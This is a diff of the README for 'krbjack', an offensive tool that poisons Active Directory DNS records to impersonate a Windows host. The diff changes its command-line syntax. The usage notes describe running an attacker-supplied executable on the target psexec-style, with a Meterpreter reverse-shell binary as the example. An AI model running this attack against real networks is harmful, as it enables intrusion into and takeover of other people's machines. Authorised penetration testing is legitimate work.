almandin/krbjack/README.md

 # Usage

-`sudo krbjack --target-name <targetNBTName> [--target-ip <targetIP>] --domain <domainName> --dc-ip <domainControlerIpAddress> --ports <port1,port2,port3,...> psexec <executable.exe>`
+`sudo krbjack --target-name <targetNBTName> [--target-ip <targetIP>] --domain <domainName> --dc-ip <domainControlerIpAddress> --ports <port1,port2,port3,...> --executable <executable.exe>`

 - `--target-name` : The netbios name of your target, the one you will impersonate, the one you want will pwn if successful.
 Example : `winserv2`;
 - `--target-ip` : You might want to specify the IP address of your target.
 The alternative is to let this tool query the DNS to get its IP addresses.
 A quick naive scan is performed to choose one IP from the ones returned by the DNS though this method is flawed.
 Example: `192.168.42.20`;
 - `--domain` : The domain name to which your target is joined.
 Example : `windomain.local`;
 - `--dc-ip` : The IP address of the domain controller you will be poisoning DNS records.
 Can be any domain controller as the DNS zones will be replicated automatically.
 Example : `192.168.42.10`;
 - `--ports` : A list of TCP ports which will be open on your attacker's machine to forward traffic to your target.
 This list is *very* important because if you omit one port which is open on the legitimate service (your target), clients wont be able to access it during the time of the attack.
 Setting this list of ports correctly is the key to perform the attack without doing to much of a mess in the network.
 Example : `135,139,445,80,443,8080`
-- `psexec <executable.exe> [--no-cleanup]` : The psexec command followed by the path to an executable on your attacker's machine.
+- `--executable <executable.exe>` : The path to an executable on your attacker's machine.
 This executable will be uploaded and executed psexec-style on your target if the attack succeeds.
-Example : `psexec /home/almandin/metx64revtcp.exe`.
+Example : `/home/almandin/metx64revtcp.exe`.

     The executable you provide can be either a "standard" executable, or a windows service executable (better).
 If it is a "standard" executable, windows will kill it when running after a few seconds if it has not ended already, because as it is run as a service, Windows expects it to do proper signaling (behave as a true service).
 Though it still works, you might want to migrate quickly your meterpreter when the session is established.